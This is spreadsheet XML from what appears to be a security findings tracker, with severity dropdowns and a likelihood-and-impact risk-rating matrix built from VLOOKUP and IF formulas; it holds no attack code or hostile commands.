      <c r="D866" s="21"/>
      <c r="E866" s="19"/>
      <c r="F866" s="19"/>
      <c r="G866" s="19"/>
      <c r="H866" s="19"/>
      <c r="I866" s="19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20"/>
      <c r="B867" s="20"/>
      <c r="C867" s="21"/>
      <c r="D867" s="21"/>
      <c r="E867" s="19"/>
      <c r="F867" s="19"/>
      <c r="G867" s="19"/>
      <c r="H867" s="19"/>
      <c r="I867" s="19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20"/>
      <c r="B868" s="20"/>
      <c r="C868" s="21"/>
      <c r="D868" s="21"/>
      <c r="E868" s="19"/>
      <c r="F868" s="19"/>
      <c r="G868" s="19"/>
      <c r="H868" s="19"/>
      <c r="I868" s="19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20"/>
      <c r="B869" s="20"/>
      <c r="C869" s="21"/>
      <c r="D869" s="21"/>
      <c r="E869" s="19"/>
      <c r="F869" s="19"/>
      <c r="G869" s="19"/>
      <c r="H869" s="19"/>
      <c r="I869" s="19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20"/>
      <c r="B870" s="20"/>
      <c r="C870" s="21"/>
      <c r="D870" s="21"/>
      <c r="E870" s="19"/>
      <c r="F870" s="19"/>
      <c r="G870" s="19"/>
      <c r="H870" s="19"/>
      <c r="I870" s="19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20"/>
      <c r="B871" s="20"/>
      <c r="C871" s="21"/>
      <c r="D871" s="21"/>
      <c r="E871" s="19"/>
      <c r="F871" s="19"/>
      <c r="G871" s="19"/>
      <c r="H871" s="19"/>
      <c r="I871" s="19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20"/>
      <c r="B872" s="20"/>
      <c r="C872" s="21"/>
      <c r="D872" s="21"/>
      <c r="E872" s="19"/>
      <c r="F872" s="19"/>
      <c r="G872" s="19"/>
      <c r="H872" s="19"/>
      <c r="I872" s="19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20"/>
      <c r="B873" s="20"/>
      <c r="C873" s="21"/>
      <c r="D873" s="21"/>
      <c r="E873" s="19"/>
      <c r="F873" s="19"/>
      <c r="G873" s="19"/>
      <c r="H873" s="19"/>
      <c r="I873" s="19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20"/>
      <c r="B874" s="20"/>
      <c r="C874" s="21"/>
      <c r="D874" s="21"/>
      <c r="E874" s="19"/>
      <c r="F874" s="19"/>
      <c r="G874" s="19"/>
      <c r="H874" s="19"/>
      <c r="I874" s="19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20"/>
      <c r="B875" s="20"/>
      <c r="C875" s="21"/>
      <c r="D875" s="21"/>
      <c r="E875" s="19"/>
      <c r="F875" s="19"/>
      <c r="G875" s="19"/>
      <c r="H875" s="19"/>
      <c r="I875" s="19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20"/>
      <c r="B876" s="20"/>
      <c r="C876" s="21"/>
      <c r="D876" s="21"/>
      <c r="E876" s="19"/>
      <c r="F876" s="19"/>
      <c r="G876" s="19"/>
      <c r="H876" s="19"/>
      <c r="I876" s="19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20"/>
      <c r="B877" s="20"/>
      <c r="C877" s="21"/>
      <c r="D877" s="21"/>
      <c r="E877" s="19"/>
      <c r="F877" s="19"/>
      <c r="G877" s="19"/>
      <c r="H877" s="19"/>
      <c r="I877" s="19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20"/>
      <c r="B878" s="20"/>
      <c r="C878" s="21"/>
      <c r="D878" s="21"/>
      <c r="E878" s="19"/>
      <c r="F878" s="19"/>
      <c r="G878" s="19"/>
      <c r="H878" s="19"/>
      <c r="I878" s="19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20"/>
      <c r="B879" s="20"/>
      <c r="C879" s="21"/>
      <c r="D879" s="21"/>
      <c r="E879" s="19"/>
      <c r="F879" s="19"/>
      <c r="G879" s="19"/>
      <c r="H879" s="19"/>
      <c r="I879" s="19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20"/>
      <c r="B880" s="20"/>
      <c r="C880" s="21"/>
      <c r="D880" s="21"/>
      <c r="E880" s="19"/>
      <c r="F880" s="19"/>
      <c r="G880" s="19"/>
      <c r="H880" s="19"/>
      <c r="I880" s="19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20"/>
      <c r="B881" s="20"/>
      <c r="C881" s="21"/>
      <c r="D881" s="21"/>
      <c r="E881" s="19"/>
      <c r="F881" s="19"/>
      <c r="G881" s="19"/>
      <c r="H881" s="19"/>
      <c r="I881" s="19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20"/>
      <c r="B882" s="20"/>
      <c r="C882" s="21"/>
      <c r="D882" s="21"/>
      <c r="E882" s="19"/>
      <c r="F882" s="19"/>
      <c r="G882" s="19"/>
      <c r="H882" s="19"/>
      <c r="I882" s="19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20"/>
      <c r="B883" s="20"/>
      <c r="C883" s="21"/>
      <c r="D883" s="21"/>
      <c r="E883" s="19"/>
      <c r="F883" s="19"/>
      <c r="G883" s="19"/>
      <c r="H883" s="19"/>
      <c r="I883" s="19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20"/>
      <c r="B884" s="20"/>
      <c r="C884" s="21"/>
      <c r="D884" s="21"/>
      <c r="E884" s="19"/>
      <c r="F884" s="19"/>
      <c r="G884" s="19"/>
      <c r="H884" s="19"/>
      <c r="I884" s="19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20"/>
      <c r="B885" s="20"/>
      <c r="C885" s="21"/>
      <c r="D885" s="21"/>
      <c r="E885" s="19"/>
      <c r="F885" s="19"/>
      <c r="G885" s="19"/>
      <c r="H885" s="19"/>
      <c r="I885" s="19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20"/>
      <c r="B886" s="20"/>
      <c r="C886" s="21"/>
      <c r="D886" s="21"/>
      <c r="E886" s="19"/>
      <c r="F886" s="19"/>
      <c r="G886" s="19"/>
      <c r="H886" s="19"/>
      <c r="I886" s="19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20"/>
      <c r="B887" s="20"/>
      <c r="C887" s="21"/>
      <c r="D887" s="21"/>
      <c r="E887" s="19"/>
      <c r="F887" s="19"/>
      <c r="G887" s="19"/>
      <c r="H887" s="19"/>
      <c r="I887" s="19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20"/>
      <c r="B888" s="20"/>
      <c r="C888" s="21"/>
      <c r="D888" s="21"/>
      <c r="E888" s="19"/>
      <c r="F888" s="19"/>
      <c r="G888" s="19"/>
      <c r="H888" s="19"/>
      <c r="I888" s="19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20"/>
      <c r="B889" s="20"/>
      <c r="C889" s="21"/>
      <c r="D889" s="21"/>
      <c r="E889" s="19"/>
      <c r="F889" s="19"/>
      <c r="G889" s="19"/>
      <c r="H889" s="19"/>
      <c r="I889" s="19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20"/>
      <c r="B890" s="20"/>
      <c r="C890" s="21"/>
      <c r="D890" s="21"/>
      <c r="E890" s="19"/>
      <c r="F890" s="19"/>
      <c r="G890" s="19"/>
      <c r="H890" s="19"/>
      <c r="I890" s="19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20"/>
      <c r="B891" s="20"/>
      <c r="C891" s="21"/>
      <c r="D891" s="21"/>
      <c r="E891" s="19"/>
      <c r="F891" s="19"/>
      <c r="G891" s="19"/>
      <c r="H891" s="19"/>
      <c r="I891" s="19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20"/>
      <c r="B892" s="20"/>
      <c r="C892" s="21"/>
      <c r="D892" s="21"/>
      <c r="E892" s="19"/>
      <c r="F892" s="19"/>
      <c r="G892" s="19"/>
      <c r="H892" s="19"/>
      <c r="I892" s="19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20"/>
      <c r="B893" s="20"/>
      <c r="C893" s="21"/>
      <c r="D893" s="21"/>
      <c r="E893" s="19"/>
      <c r="F893" s="19"/>
      <c r="G893" s="19"/>
      <c r="H893" s="19"/>
      <c r="I893" s="19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20"/>
      <c r="B894" s="20"/>
      <c r="C894" s="21"/>
      <c r="D894" s="21"/>
      <c r="E894" s="19"/>
      <c r="F894" s="19"/>
      <c r="G894" s="19"/>
      <c r="H894" s="19"/>
      <c r="I894" s="19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20"/>
      <c r="B895" s="20"/>
      <c r="C895" s="21"/>
      <c r="D895" s="21"/>
      <c r="E895" s="19"/>
      <c r="F895" s="19"/>
      <c r="G895" s="19"/>
      <c r="H895" s="19"/>
      <c r="I895" s="19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20"/>
      <c r="B896" s="20"/>
      <c r="C896" s="21"/>
      <c r="D896" s="21"/>
      <c r="E896" s="19"/>
      <c r="F896" s="19"/>
      <c r="G896" s="19"/>
      <c r="H896" s="19"/>
      <c r="I896" s="19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20"/>
      <c r="B897" s="20"/>
      <c r="C897" s="21"/>
      <c r="D897" s="21"/>
      <c r="E897" s="19"/>
      <c r="F897" s="19"/>
      <c r="G897" s="19"/>
      <c r="H897" s="19"/>
      <c r="I897" s="19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20"/>
      <c r="B898" s="20"/>
      <c r="C898" s="21"/>
      <c r="D898" s="21"/>
      <c r="E898" s="19"/>
      <c r="F898" s="19"/>
      <c r="G898" s="19"/>
      <c r="H898" s="19"/>
      <c r="I898" s="19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20"/>
      <c r="B899" s="20"/>
      <c r="C899" s="21"/>
      <c r="D899" s="21"/>
      <c r="E899" s="19"/>
      <c r="F899" s="19"/>
      <c r="G899" s="19"/>
      <c r="H899" s="19"/>
      <c r="I899" s="19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20"/>
      <c r="B900" s="20"/>
      <c r="C900" s="21"/>
      <c r="D900" s="21"/>
      <c r="E900" s="19"/>
      <c r="F900" s="19"/>
      <c r="G900" s="19"/>
      <c r="H900" s="19"/>
      <c r="I900" s="19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20"/>
      <c r="B901" s="20"/>
      <c r="C901" s="21"/>
      <c r="D901" s="21"/>
      <c r="E901" s="19"/>
      <c r="F901" s="19"/>
      <c r="G901" s="19"/>
      <c r="H901" s="19"/>
      <c r="I901" s="19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20"/>
      <c r="B902" s="20"/>
      <c r="C902" s="21"/>
      <c r="D902" s="21"/>
      <c r="E902" s="19"/>
      <c r="F902" s="19"/>
      <c r="G902" s="19"/>
      <c r="H902" s="19"/>
      <c r="I902" s="19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20"/>
      <c r="B903" s="20"/>
      <c r="C903" s="21"/>
      <c r="D903" s="21"/>
      <c r="E903" s="19"/>
      <c r="F903" s="19"/>
      <c r="G903" s="19"/>
      <c r="H903" s="19"/>
      <c r="I903" s="19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20"/>
      <c r="B904" s="20"/>
      <c r="C904" s="21"/>
      <c r="D904" s="21"/>
      <c r="E904" s="19"/>
      <c r="F904" s="19"/>
      <c r="G904" s="19"/>
      <c r="H904" s="19"/>
      <c r="I904" s="19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20"/>
      <c r="B905" s="20"/>
      <c r="C905" s="21"/>
      <c r="D905" s="21"/>
      <c r="E905" s="19"/>
      <c r="F905" s="19"/>
      <c r="G905" s="19"/>
      <c r="H905" s="19"/>
      <c r="I905" s="19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20"/>
      <c r="B906" s="20"/>
      <c r="C906" s="21"/>
      <c r="D906" s="21"/>
      <c r="E906" s="19"/>
      <c r="F906" s="19"/>
      <c r="G906" s="19"/>
      <c r="H906" s="19"/>
      <c r="I906" s="19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20"/>
      <c r="B907" s="20"/>
      <c r="C907" s="21"/>
      <c r="D907" s="21"/>
      <c r="E907" s="19"/>
      <c r="F907" s="19"/>
      <c r="G907" s="19"/>
      <c r="H907" s="19"/>
      <c r="I907" s="19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20"/>
      <c r="B908" s="20"/>
      <c r="C908" s="21"/>
      <c r="D908" s="21"/>
      <c r="E908" s="19"/>
      <c r="F908" s="19"/>
      <c r="G908" s="19"/>
      <c r="H908" s="19"/>
      <c r="I908" s="19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20"/>
      <c r="B909" s="20"/>
      <c r="C909" s="21"/>
      <c r="D909" s="21"/>
      <c r="E909" s="19"/>
      <c r="F909" s="19"/>
      <c r="G909" s="19"/>
      <c r="H909" s="19"/>
      <c r="I909" s="19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20"/>
      <c r="B910" s="20"/>
      <c r="C910" s="21"/>
      <c r="D910" s="21"/>
      <c r="E910" s="19"/>
      <c r="F910" s="19"/>
      <c r="G910" s="19"/>
      <c r="H910" s="19"/>
      <c r="I910" s="19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20"/>
      <c r="B911" s="20"/>
      <c r="C911" s="21"/>
      <c r="D911" s="21"/>
      <c r="E911" s="19"/>
      <c r="F911" s="19"/>
      <c r="G911" s="19"/>
      <c r="H911" s="19"/>
      <c r="I911" s="19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20"/>
      <c r="B912" s="20"/>
      <c r="C912" s="21"/>
      <c r="D912" s="21"/>
      <c r="E912" s="19"/>
      <c r="F912" s="19"/>
      <c r="G912" s="19"/>
      <c r="H912" s="19"/>
      <c r="I912" s="19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20"/>
      <c r="B913" s="20"/>
      <c r="C913" s="21"/>
      <c r="D913" s="21"/>
      <c r="E913" s="19"/>
      <c r="F913" s="19"/>
      <c r="G913" s="19"/>
      <c r="H913" s="19"/>
      <c r="I913" s="19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20"/>
      <c r="B914" s="20"/>
      <c r="C914" s="21"/>
      <c r="D914" s="21"/>
      <c r="E914" s="19"/>
      <c r="F914" s="19"/>
      <c r="G914" s="19"/>
      <c r="H914" s="19"/>
      <c r="I914" s="19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20"/>
      <c r="B915" s="20"/>
      <c r="C915" s="21"/>
      <c r="D915" s="21"/>
      <c r="E915" s="19"/>
      <c r="F915" s="19"/>
      <c r="G915" s="19"/>
      <c r="H915" s="19"/>
      <c r="I915" s="19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20"/>
      <c r="B916" s="20"/>
      <c r="C916" s="21"/>
      <c r="D916" s="21"/>
      <c r="E916" s="19"/>
      <c r="F916" s="19"/>
      <c r="G916" s="19"/>
      <c r="H916" s="19"/>
      <c r="I916" s="19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</sheetData>
  <autoFilter ref="A3:I4" xr:uid="{7446B5ED-CDB7-3245-A395-0FE181A50021}"/>
  <mergeCells count="11">
    <mergeCell ref="J3:J4"/>
    <mergeCell ref="A1:J1"/>
    <mergeCell ref="A3:A4"/>
    <mergeCell ref="B3:B4"/>
    <mergeCell ref="C3:C4"/>
    <mergeCell ref="D3:D4"/>
    <mergeCell ref="E3:E4"/>
    <mergeCell ref="F3:F4"/>
    <mergeCell ref="H3:H4"/>
    <mergeCell ref="I3:I4"/>
    <mergeCell ref="G3:G4"/>
  </mergeCells>
  <conditionalFormatting sqref="D5:F5">
    <cfRule type="cellIs" dxfId="20" priority="51" operator="equal">
      <formula>"Critical"</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="D5:F5">
    <cfRule type="cellIs" dxfId="19" priority="52" operator="equal">
      <formula>"OFI"</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="D5:F5">
    <cfRule type="cellIs" dxfId="18" priority="53" operator="equal">
      <formula>"Low"</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="D5:F5">
    <cfRule type="cellIs" dxfId="17" priority="54" operator="equal">
      <formula>"Moderate"</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="D5:F5">
    <cfRule type="cellIs" dxfId="16" priority="55" operator="equal">
      <formula>"High"</formula>
    </cfRule>
  </conditionalFormatting>
  <dataValidations count="1">
    <dataValidation type="list" allowBlank="1" showErrorMessage="1" sqref="D5:F5" xr:uid="{41F93A5D-0C3C-0A48-A879-DAE63D8E9830}">
      <formula1>"Critical,High,Moderate,Low,OFI"</formula1>
    </dataValidation>
  </dataValidations>
  <pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0" footer="0"/>
  <pageSetup orientation="portrait"/>
  <ignoredErrors>
    <ignoredError sqref="A5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9710C-92B6-BF46-BB6C-37DF995E4CA9}">
  <dimension ref="A1:H26"/>
  <sheetViews>
    <sheetView showGridLines="0" zoomScale="120" zoomScaleNormal="120" workbookViewId="0">
      <selection activeCell="A5" sqref="A5"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="8.85546875" defaultRowHeight="12.95"/>
  <cols>
    <col min="1" max="1" width="18.42578125" style="59" bestFit="1" customWidth="1"/>
    <col min="2" max="4" width="14.7109375" style="59" customWidth="1"/>
    <col min="5" max="5" width="5.42578125" style="59" bestFit="1" customWidth="1"/>
    <col min="6" max="6" width="20.7109375" style="59" bestFit="1" customWidth="1"/>
    <col min="7" max="7" width="42.7109375" style="59" customWidth="1"/>
    <col min="8" max="8" width="3.7109375" style="59" customWidth="1"/>
    <col min="9" max="9" width="8.85546875" style="59"/>
    <col min="10" max="10" width="40.42578125" style="59" bestFit="1" customWidth="1"/>
    <col min="11" max="16384" width="8.85546875" style="59"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:8" ht="21" customHeight="1">
      <c r="A1" s="75" t="s">
        <v>666</v>
      </c>
      <c r="B1" s="74"/>
      <c r="C1" s="74"/>
      <c r="D1" s="74"/>
      <c r="E1" s="74"/>
      <c r="F1" s="74"/>
      <c r="G1" s="74"/>
    </row>
    <row r="3" spans="1:8" ht="15">
      <c r="A3" s="91" t="s">
        <v>667</v>
      </c>
      <c r="B3" s="91"/>
      <c r="C3" s="91"/>
      <c r="D3" s="91"/>
      <c r="E3" s="60"/>
      <c r="F3" s="91" t="s">
        <v>668</v>
      </c>
      <c r="G3" s="91"/>
    </row>
    <row r="4" spans="1:8" ht="15">
      <c r="A4" s="92" t="s">
        <v>669</v>
      </c>
      <c r="B4" s="92"/>
      <c r="C4" s="92"/>
      <c r="D4" s="92"/>
      <c r="E4" s="61"/>
      <c r="F4" s="92" t="s">
        <v>670</v>
      </c>
      <c r="G4" s="92"/>
    </row>
    <row r="5" spans="1:8" ht="15.95">
      <c r="A5" s="76" t="s">
        <v>671</v>
      </c>
      <c r="B5" s="93" t="s">
        <v>672</v>
      </c>
      <c r="C5" s="100"/>
      <c r="D5" s="100"/>
      <c r="E5" s="63">
        <f>VLOOKUP(B5,References!A2:B8,2,FALSE)</f>
        <v>3</v>
      </c>
      <c r="F5" s="76" t="s">
        <v>673</v>
      </c>
      <c r="G5" s="84" t="s">
        <v>674</v>
      </c>
      <c r="H5" s="64">
        <f>VLOOKUP(G5,References!A$11:B$16,2,FALSE)</f>
        <v>6</v>
      </c>
    </row>
    <row r="6" spans="1:8" ht="15.95">
      <c r="A6" s="76" t="s">
        <v>675</v>
      </c>
      <c r="B6" s="97" t="s">
        <v>676</v>
      </c>
      <c r="C6" s="97"/>
      <c r="D6" s="97"/>
      <c r="E6" s="63">
        <f>VLOOKUP(B6,References!C2:D6,2,FALSE)</f>
        <v>4</v>
      </c>
      <c r="F6" s="76" t="s">
        <v>677</v>
      </c>
      <c r="G6" s="84" t="s">
        <v>678</v>
      </c>
      <c r="H6" s="64">
        <f>VLOOKUP(G6,References!C$11:D$17,2,FALSE)</f>
        <v>1</v>
      </c>
    </row>
    <row r="7" spans="1:8" ht="15.95">
      <c r="A7" s="76" t="s">
        <v>679</v>
      </c>
      <c r="B7" s="97" t="s">
        <v>680</v>
      </c>
      <c r="C7" s="97"/>
      <c r="D7" s="97"/>
      <c r="E7" s="63">
        <f>VLOOKUP(B7,References!E2:F6,2,FALSE)</f>
        <v>4</v>
      </c>
      <c r="F7" s="76" t="s">
        <v>681</v>
      </c>
      <c r="G7" s="84" t="s">
        <v>682</v>
      </c>
      <c r="H7" s="64">
        <f>VLOOKUP(G7,References!E$11:F$16,2,FALSE)</f>
        <v>1</v>
      </c>
    </row>
    <row r="8" spans="1:8" ht="15.95">
      <c r="A8" s="76" t="s">
        <v>683</v>
      </c>
      <c r="B8" s="97" t="s">
        <v>684</v>
      </c>
      <c r="C8" s="97"/>
      <c r="D8" s="97"/>
      <c r="E8" s="63">
        <f>VLOOKUP(B8,References!G3:H8,2,FALSE)</f>
        <v>5</v>
      </c>
      <c r="F8" s="76" t="s">
        <v>685</v>
      </c>
      <c r="G8" s="84" t="s">
        <v>686</v>
      </c>
      <c r="H8" s="64">
        <f>VLOOKUP(G8,References!G$11:H$16,2,FALSE)</f>
        <v>1</v>
      </c>
    </row>
    <row r="9" spans="1:8" ht="15">
      <c r="A9" s="62"/>
      <c r="B9" s="63"/>
      <c r="C9" s="63"/>
      <c r="D9" s="63"/>
      <c r="E9" s="63"/>
      <c r="F9" s="62"/>
      <c r="G9" s="63"/>
      <c r="H9" s="64"/>
    </row>
    <row r="10" spans="1:8" ht="15">
      <c r="A10" s="92" t="s">
        <v>687</v>
      </c>
      <c r="B10" s="92"/>
      <c r="C10" s="92"/>
      <c r="D10" s="92"/>
      <c r="E10" s="61"/>
      <c r="F10" s="92" t="s">
        <v>688</v>
      </c>
      <c r="G10" s="92"/>
      <c r="H10" s="61"/>
    </row>
    <row r="11" spans="1:8" ht="15.95">
      <c r="A11" s="76" t="s">
        <v>689</v>
      </c>
      <c r="B11" s="93" t="s">
        <v>690</v>
      </c>
      <c r="C11" s="93"/>
      <c r="D11" s="93"/>
      <c r="E11" s="63">
        <f>VLOOKUP(B11,References!I2:J7,2,FALSE)</f>
        <v>9</v>
      </c>
      <c r="F11" s="76" t="s">
        <v>691</v>
      </c>
      <c r="G11" s="84" t="s">
        <v>692</v>
      </c>
      <c r="H11" s="64">
        <f>VLOOKUP(G11,References!I$11:J$16,2,FALSE)</f>
        <v>3</v>
      </c>
    </row>
    <row r="12" spans="1:8" ht="15.95">
      <c r="A12" s="76" t="s">
        <v>693</v>
      </c>
      <c r="B12" s="93" t="s">
        <v>690</v>
      </c>
      <c r="C12" s="93"/>
      <c r="D12" s="93"/>
      <c r="E12" s="63">
        <f>VLOOKUP(B12,References!K$2:L$7,2,FALSE)</f>
        <v>9</v>
      </c>
      <c r="F12" s="76" t="s">
        <v>694</v>
      </c>
      <c r="G12" s="84" t="s">
        <v>695</v>
      </c>
      <c r="H12" s="64">
        <f>VLOOKUP(G12,References!K$11:L$16,2,FALSE)</f>
        <v>4</v>
      </c>
    </row>
    <row r="13" spans="1:8" ht="15.95">
      <c r="A13" s="76" t="s">
        <v>696</v>
      </c>
      <c r="B13" s="93" t="s">
        <v>697</v>
      </c>
      <c r="C13" s="93"/>
      <c r="D13" s="93"/>
      <c r="E13" s="63">
        <f>VLOOKUP(B13,References!M$2:N$7,2,FALSE)</f>
        <v>4</v>
      </c>
      <c r="F13" s="76" t="s">
        <v>698</v>
      </c>
      <c r="G13" s="84" t="s">
        <v>699</v>
      </c>
      <c r="H13" s="64">
        <f>VLOOKUP(G13,References!M$11:O$16,2,FALSE)</f>
        <v>0</v>
      </c>
    </row>
    <row r="14" spans="1:8" ht="15.95">
      <c r="A14" s="76" t="s">
        <v>700</v>
      </c>
      <c r="B14" s="93" t="s">
        <v>701</v>
      </c>
      <c r="C14" s="93"/>
      <c r="D14" s="93"/>
      <c r="E14" s="63">
        <f>VLOOKUP(B14,References!O$2:P$7,2,FALSE)</f>
        <v>8</v>
      </c>
      <c r="F14" s="76" t="s">
        <v>702</v>
      </c>
      <c r="G14" s="84" t="s">
        <v>703</v>
      </c>
      <c r="H14" s="64">
        <f>VLOOKUP(G14,References!O$11:P$16,2,FALSE)</f>
        <v>3</v>
      </c>
    </row>
    <row r="15" spans="1:8" ht="15">
      <c r="E15" s="62"/>
    </row>
    <row r="16" spans="1:8" ht="15" customHeight="1">
      <c r="A16" s="94" t="s">
        <v>704</v>
      </c>
      <c r="B16" s="95">
        <f>IFERROR(AVERAGE(E5:E8,E11:E14),"All factors require a selection.")</f>
        <v>5.75</v>
      </c>
      <c r="C16" s="95"/>
      <c r="D16" s="95"/>
      <c r="E16" s="62"/>
      <c r="F16" s="96" t="s">
        <v>705</v>
      </c>
      <c r="G16" s="95">
        <f>IFERROR(AVERAGE(H5:H8,H11:H14),"All factors require a selection.")</f>
        <v>2.375</v>
      </c>
    </row>
    <row r="17" spans="1:7" ht="15" customHeight="1">
      <c r="A17" s="94"/>
      <c r="B17" s="95"/>
      <c r="C17" s="95"/>
      <c r="D17" s="95"/>
      <c r="F17" s="96"/>
      <c r="G17" s="95"/>
    </row>
    <row r="20" spans="1:7" ht="18.95">
      <c r="B20" s="99" t="s">
        <v>706</v>
      </c>
      <c r="C20" s="99"/>
      <c r="D20" s="78" t="str">
        <f>IFERROR(IF(AND($B$16&lt;3,$G$16&lt;3),"Note",IF(OR(AND($B$16&lt;3,$G$16&gt;=3,$G$16&lt;6),AND($B$16&gt;=3,$B$16&lt;6,$G$16&lt;3)),"Low",IF(OR(AND($B16&lt;3,$G16&gt;=6),AND($B16&gt;=3,$B16&lt;6,$G16&gt;=3,$G16&lt;6),AND($B16&gt;=6,$G16&lt;3)),"MODERATE",IF(OR(AND($B16&gt;=6,$B16&gt;=3,$G16&lt;6),AND($B16&gt;=3,$B16&lt;6,$G16&gt;6)),"High","Critical")))),"Note")</f>
        <v>Low</v>
      </c>
      <c r="E20" s="77"/>
      <c r="F20" s="77"/>
      <c r="G20" s="65"/>
    </row>
    <row r="22" spans="1:7" ht="15">
      <c r="B22" s="98" t="s">
        <v>657</v>
      </c>
      <c r="C22" s="98"/>
      <c r="D22" s="98"/>
    </row>
    <row r="23" spans="1:7" ht="15">
      <c r="A23" s="66" t="s">
        <v>656</v>
      </c>
      <c r="B23" s="65" t="str">
        <f>IF($G16&lt;3,"-&gt;Low&lt;-","Low")</f>
        <v>-&gt;Low&lt;-</v>
      </c>
      <c r="C23" s="65" t="str">
        <f>IF(AND($G16&gt;=3,$G16&lt;6),"-&gt;Moderate&lt;-","Moderate")</f>
        <v>Moderate</v>
      </c>
      <c r="D23" s="65" t="str">
        <f>IF($G16&gt;=6,"-&gt;High&lt;-","High")</f>
        <v>High</v>
      </c>
    </row>
    <row r="24" spans="1:7">
      <c r="A24" s="67" t="str">
        <f>IF($B16&lt;3,"-&gt;Low&lt;-","Low")</f>
        <v>Low</v>
      </c>
      <c r="B24" s="68" t="str">
        <f>IF(AND($B$16&lt;3,$G$16&lt;3),"-&gt;Note&lt;-","Note")</f>
        <v>Note</v>
      </c>
      <c r="C24" s="69" t="str">
        <f>IF(AND($B$16&lt;3,$G$16&gt;=3,$G$16&lt;6),"-&gt;Low&lt;-","Low")</f>
        <v>Low</v>
      </c>
      <c r="D24" s="70" t="str">
        <f>IF(AND($B16&lt;3,$G16&gt;=6),"-&gt;Moderate&lt;-","Moderate")</f>
        <v>Moderate</v>
      </c>
      <c r="F24" s="71"/>
    </row>
    <row r="25" spans="1:7">
      <c r="A25" s="67" t="str">
        <f>IF(AND($B16&gt;=3,$B16&lt;6),"-&gt;Moderate&lt;-","Moderate")</f>
        <v>-&gt;Moderate&lt;-</v>
      </c>
      <c r="B25" s="69" t="str">
        <f>IF(AND($B$16&gt;=3,$B$16&lt;6,$G$16&lt;3),"-&gt;Low&lt;-","Low")</f>
        <v>-&gt;Low&lt;-</v>
      </c>
      <c r="C25" s="70" t="str">
        <f>IF(AND($B16&gt;=3,$B16&lt;6,$G16&gt;=3,$G16&lt;6),"-&gt;Moderate&lt;-","Moderate")</f>
        <v>Moderate</v>
      </c>
      <c r="D25" s="72" t="str">
        <f>IF(AND($B16&gt;=3,$B16&lt;6,$G16&gt;6),"-&gt;High&lt;-","High")</f>
        <v>High</v>
      </c>
      <c r="F25" s="71"/>
    </row>
    <row r="26" spans="1:7">
      <c r="A26" s="67" t="str">
        <f>IF($B16&gt;=6,"-&gt;High&lt;-","High")</f>
        <v>High</v>
      </c>
      <c r="B26" s="70" t="str">
        <f>IF(AND($B16&gt;=6,$G16&lt;3),"-&gt;Moderate&lt;-","Moderate")</f>
        <v>Moderate</v>
      </c>
      <c r="C26" s="72" t="str">
        <f>IF(AND($B16&gt;=6,$B16&gt;=3,$G16&lt;6),"-&gt;High&lt;-","High")</f>
        <v>High</v>
      </c>
      <c r="D26" s="73" t="str">
        <f>IF(AND($B$16&gt;=6,$G$16&gt;=6),"-&gt;Critical&lt;-","Critical")</f>
        <v>Critical</v>
      </c>
    </row>
  </sheetData>
  <dataConsolidate function="varp"/>
  <mergeCells count="20">
    <mergeCell ref="B22:D22"/>
    <mergeCell ref="B20:C20"/>
    <mergeCell ref="B12:D12"/>
    <mergeCell ref="B13:D13"/>
    <mergeCell ref="B14:D14"/>
    <mergeCell ref="A16:A17"/>
    <mergeCell ref="B16:D17"/>
    <mergeCell ref="F16:F17"/>
    <mergeCell ref="B6:D6"/>
    <mergeCell ref="B7:D7"/>
    <mergeCell ref="B8:D8"/>
    <mergeCell ref="A10:D10"/>
    <mergeCell ref="F10:G10"/>
    <mergeCell ref="B11:D11"/>
    <mergeCell ref="G16:G17"/>
    <mergeCell ref="A3:D3"/>
    <mergeCell ref="F3:G3"/>
    <mergeCell ref="A4:D4"/>
    <mergeCell ref="F4:G4"/>
    <mergeCell ref="B5:D5"/>
  </mergeCells>
  <conditionalFormatting sqref="E20:F20">
    <cfRule type="containsText" dxfId="15" priority="12" operator="containsText" text="critical">
      <formula>NOT(ISERROR(SEARCH("critical",E20)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="14" priority="13" operator="containsText" text="high">
      <formula>NOT(ISERROR(SEARCH("high",E20)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="13" priority="14" operator="containsText" text="moderate">
      <formula>NOT(ISERROR(SEARCH("moderate",E20)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="12" priority="15" operator="containsText" text="low">
      <formula>NOT(ISERROR(SEARCH("low",E20)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="11" priority="16" operator="containsText" text="Note">
      <formula>NOT(ISERROR(SEARCH("Note",E20)))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="A24:A26 B23:D23">
    <cfRule type="containsText" dxfId="10" priority="11" operator="containsText" text="&lt;">
      <formula>NOT(ISERROR(SEARCH("&lt;",A23)))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="B23:D26 A24:A26">
    <cfRule type="containsText" dxfId="9" priority="10" operator="containsText" text="&lt;">
      <formula>NOT(ISERROR(SEARCH("&lt;",A23)))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="C26">
    <cfRule type="containsText" dxfId="8" priority="9" operator="containsText" text="&lt;">
      <formula>NOT(ISERROR(SEARCH("&lt;",C26)))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="D25">
    <cfRule type="containsText" dxfId="7" priority="8" operator="containsText" text="&lt;">
      <formula>NOT(ISERROR(SEARCH("&lt;",D25)))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="C25">
    <cfRule type="containsText" dxfId="6" priority="7" operator="containsText" text="&lt;">
      <formula>NOT(ISERROR(SEARCH("&lt;",C25)))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="B26">
    <cfRule type="containsText" dxfId="5" priority="6" operator="containsText" text="&lt;">
      <formula>NOT(ISERROR(SEARCH("&lt;",B26)))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="D20">
    <cfRule type="containsText" dxfId="4" priority="1" operator="containsText" text="critical">
      <formula>NOT(ISERROR(SEARCH("critical",D20)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="3" priority="2" operator="containsText" text="high">
